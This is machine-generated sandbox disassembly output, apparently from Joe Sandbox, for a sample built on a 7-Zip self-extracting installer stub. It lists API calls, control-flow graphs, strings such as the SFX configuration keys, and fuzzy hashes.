                                                                                              • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                              • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                              • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                              • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                                                              • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                                                              • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                                                              • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                                                              • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                                                                            • wsprintfW.USER32 ref: 00405595
                                                                                            • _wtol.MSVCRT ref: 004057DE
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                                                                            • CoInitialize.OLE32(00000000), ref: 004059E9
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                                                                            • GetKeyState.USER32(00000010), ref: 00405AA1
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                                                            • memset.MSVCRT ref: 004060AE
                                                                                            • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                                                            • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                                                              • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                              • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                              • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                              • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                              • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                                                            • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                                                            • _wtol.MSVCRT ref: 00405F65
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                                                            • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                                                                            • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                                                            • API String ID: 154539431-3058303289
                                                                                            • Opcode ID: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                                                                            • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                                                            • Opcode Fuzzy Hash: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                                                                            • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 700 4017a2-4017a8 695->700 701 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->701 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 700->704 705 4017aa-4017ad 700->705 701->660 709 4017dc-4017df 704->709 707 4017b6-4017c2 705->707 708 4017af-4017b1 705->708 707->709 708->693 710 4017e1-4017e3 call 403354 709->710 711 4017f8-4017ff call 40301a 709->711 714 4017e8-4017eb 710->714 715 401804-401809 711->715 714->697 716 4017f1-4017f3 714->716 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 746 4018d1-4018d9 739->746 747 4018db-4018f3 call 40db53 739->747 742 40188a-40189a ??3@YAXPAX@Z 740->742 744 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 742->744 745 40189c-40189e 742->745 744->660 745->744 746->742 753 4018f5-401904 GetLastError 747->753 754 401906-40190e ??3@YAXPAX@Z 747->754 753->742 754->729
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                                            • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                                                            • Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                                            • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
APIs
• GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
• SetLastError.KERNEL32(00000010), ref: 0040303D
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: AttributesErrorFileLast
• String ID:
• API String ID: 1799206407-0
• Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
• Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
• Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
• Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
APIs
• GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
• SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: DiskFreeMessageSendSpace
• String ID:
• API String ID: 696007252-0
• Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
• Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
• Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
• Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
• String ID: HpA
• API String ID: 801014965-2938899866
• Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
• Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
• Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
• Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
• CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
• SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
• DispatchMessageW.USER32(?), ref: 00401B89
• KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
• KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
• String ID: Static
• API String ID: 2479445380-2272013587
• Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
• Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
• Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
• Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

Control-flow Graph
APIs
• memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
• memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: ??3@memcpymemmove
• String ID:
• API String ID: 3549172513-3916222277
• Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
• Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
• Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
• Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

Control-flow Graph
APIs
• lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
• GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
• ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
